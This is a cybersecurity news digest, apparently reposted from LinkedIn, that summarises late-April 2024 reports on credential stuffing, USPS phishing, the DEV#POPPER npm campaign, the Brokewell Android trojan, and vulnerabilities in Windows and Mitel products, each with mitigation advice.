CISO Daily Update - April 29, 2024
NEW DEVELOPMENTS
Okta Warns of Unprecedented Surge in Proxy-Driven Credential Stuffing Attacks
Source: The Hacker News
Okta raised alarms over an unprecedented surge in credential-stuffing attacks against online services–driven by the widespread availability of residential proxy services, stolen credential lists, and automated attack tools. These attacks route login attempts through residential internet service provider (ISP) networks using compromised devices unknowingly conscripted into botnets–obfuscating malicious traffic as originating from legitimate sources. Okta observed millions of proxy-based credential stuffing attempts between April 19-26, likely from infrastructure linked to recent global brute-force campaigns. To mitigate account takeover risks, Okta recommends enforcing strong passwords, multi-factor authentication, geofencing, and FIDO-compliant passkeys to replace vulnerable password-based authentication.?
Hackers May Have Accessed Thousands of Accounts on the California State Welfare Platform
Source: Security Affairs
Threat actors breached over 19,000 accounts on California's BenefitsCal welfare platform by exploiting reused passwords from third-party sites. Compromised accounts may have been accessed between March 1, 2023, and February 13, 2024, with exposed datatypes including names, addresses, and partial social security numbers. BenefitsCal has deactivated accounts, launched an investigation, and implemented additional security measures which include 2FA. Users are urged to use strong, unique passwords and monitor their accounts for suspicious activity.
US Post Office Phishing Sites Get As Much Traffic As the Real One
Source: Bleeping Computer
Security researchers found a proliferation of phishing domains mimicking the United States Postal Service (USPS) website which generates nearly as much traffic as the legitimate site–even exceeding it during holiday periods. These deceptive combosquatting domains replicate USPS' branding and functionality like package tracking to trick victims into entering credentials or payment details. The convincing campaigns span fake storefronts purportedly selling stamps and gifts alongside SMS-based lures that entice users to access tracking pages harboring malicious JavaScript. Between October 2023 and February 2024, over 1.1 million queries were made to the fraudulent domains across popular TLDs like .com, .top, and .shop.
FBI: Fraudsters Using Fake Online Dating Verification Apps to Scam Lovers
Source: The Record?
The FBI is alerting the public to a new romance scam where cybercriminals lure online daters into downloading malicious "verification" apps that steal personal and financial information. The scheme begins by tricking victims into leaving legitimate dating platforms for encrypted messaging where scammers claim a "free" verification process can vet users against predators. Fake websites then prompt entering details like names, emails, phone numbers, and payment card data, supposedly for safety checks. However, this scheme harvests sensitive data for identity theft while also subscribing victims to fraudulent paid dating services with recurring billing. This sophisticated social engineering tactic capitalizes on individuals' security concerns around online dating to perpetrate identity fraud and unauthorized charges.?
Bogus npm Packages Used to Trick Software Developers into Installing Malware
Source: The Hacker News
A sophisticated social engineering operation is exploiting fake job interviews to trick software developers into installing malicious npm packages containing a Python backdoor. The DEV#POPPER campaign, potentially linked to North Korean threat actors, lures victims with GitHub repositories hosting seemingly benign Node.js modules that actually deploy an information-stealing malware. This loader fetches and executes the malicious implant, granting attackers capabilities like command execution, file theft, keystroke logging, and persistent access on infected developer workstations. Maintaining a vigilant security mindset, particularly during stressful situations like job interviews, is crucial to prevent such social engineering attacks.
Kaiser’s Website Tracking Tools May Have Compromised Data on 13 Million Customers
Source: The Record
Kaiser Permanente is notifying over 13 million customers about a potential data compromise involving their personal information shared with third-party vendors. The information may include IP addresses and navigation details on Kaiser websites and was possibly accessed through tracking software. While financial data and social security numbers were not affected, the breach involved vendors like Google, Microsoft Bing, and X (formerly Twitter). Despite no reported misuse, Kaiser is initiating notifications starting in May. This incident follows prior scrutiny over Kaiser's use of tracking tools, with ongoing litigation and broader concerns about healthcare providers' use of such technologies.
领英推荐
Thousands of Qlik Sense Servers Open to Cactus Ransomware
Source: Darkreading
Despite warnings and patches issued by Qlik last year, thousands of Qlik Sense servers remain vulnerable to the Cactus ransomware group's exploits. These vulnerabilities, disclosed in August and September, allow remote attackers to execute arbitrary code on affected systems. Despite ongoing exploitation by the Cactus group, a recent scan revealed over 3,000 Internet-accessible Qlik Sense servers still susceptible to these attacks–notable concentrations are in the US, Italy, Brazil, Netherlands, and Germany. Security organizations like Fox-IT and the Dutch Institute for Vulnerability Disclosure (DIVD) are actively notifying potential victims and collaborating under Project Melissa to disrupt Cactus group operations. The ShadowServer Foundation is also issuing critical alerts, warning organizations of the high likelihood of compromise if vulnerabilities are not remediated promptly.?
Brokewell Android Malware Supports an Extensive Set of Device Takeover Capabilities
Source: Security Affairs
Researchers uncovered a new Android banking trojan called Brokewell that implements an array of device takeover features. Distributed via fake app updates, Brokewell can overlay credential-stealing screens, capture cookies, log all user interactions like touches and text entries, and exfiltrate device data–including call logs and locations. Most concerning, it enables remote device control—streaming the victim's screen while allowing the attacker to simulate taps, swipes, scrolls, and app launches. Brokewell exemplifies the growing criminal demand for comprehensive device takeover malware to circumvent anti-fraud defenses.
VULNERABILITIES TO WATCH
Windows Kernel EoP Vulnerability (CVE-2024-21345) Gets PoC Exploit Code
Source: SecurityOnline. info
Security researcher Gabe Kirkpatrick unveiled a proof-of-concept (PoC) exploit code for CVE-2024-21345–a critical Windows Kernel Elevation of Privilege vulnerability. This exploit, accessible to authenticated attackers, enables escalation to SYSTEM-level privileges to grant full control over affected systems. The flaw was resolved in February 2024 Patch Tuesday updates, and exploits a double-fetch issue in NtQueryInformationThread syscall–allowing manipulation of kernel memory handling operations. Immediate patch installation is crucial to mitigate this high-severity risk.
Mitel Issues Critical Fixes for XSS Vulnerabilities in MiContact Center Business
Source: SecurityOnline. info
Mitel addressed two high-severity cross-site scripting (XSS) flaws in its MiContact Center Business platform that could allow unauthenticated attackers to execute malicious code. The first, a stored XSS issue in the Ignite component (CVSS 9.3) enables injecting scripts when other users access impacted application pages. The second is a reflected XSS in the Legacy Chat feature (CVSS 8.1) that tricks victims into visiting crafted URLs to run arbitrary scripts. Both vulnerabilities affect versions up to 10.0.0.4 and are remediated in 10.1.0.1 or through hotfixes KB560730/KB560732. Exploiting these XSS risks could facilitate data theft, account hijacking, and further attacks on contact center systems. Mitel urges customers to promptly patch or consider disabling vulnerable legacy components to prevent these critical vulnerabilities.
SPECIAL REPORTS
Top 5 Breaches Caused by Infostealer Infections
Source: Infostealers
Major corporations like Orange Spain, CircleCI, Airbus suppliers, and hacker forums have fallen victim to data breaches stemming from infostealer malware compromising employee systems. These stealthy infections extract credentials and sensitive data, enabling threat actors to hijack accounts, disrupt operations through misconfigurations, access proprietary databases and intellectual property, and escalate privileges for wider network infiltrations. High-profile incidents like Uber's breach highlight the infostealer's role as an initial attack vector to then pave the way for more destructive cyberattacks. Cybersecurity measures include continuous monitoring for infostealer indicators, stringent access controls, and proactive threat hunting–all imperative to mitigate this risk and prevent credential exposures.
Most People Still Rely on Memory or Pen and Paper for Password Management
Source: Help Net Security
A global survey by Bitwarden reveals poor password habits persist despite growing cybersecurity awareness–25% reuse passwords across over 10 accounts, 36% base credentials on publicly available personal information, and most still rely on insecure memory or pen-and-paper management. While 68% feel prepared against AI-powered attacks, risky practices like public WiFi use and not enabling 2FA undermine this confidence. 19% have suffered security breaches from poor password hygiene. However, positive trends are emerging with password manager adoption driving more secure behaviors at home (reduced reuse by 45%) and work (51% more security conscious). 2FA usage is increasing alongside organizational efforts post-cyberattacks. The passwordless future also shows promise–52% understand passkey benefits, and 62% would trust companies implementing them more.?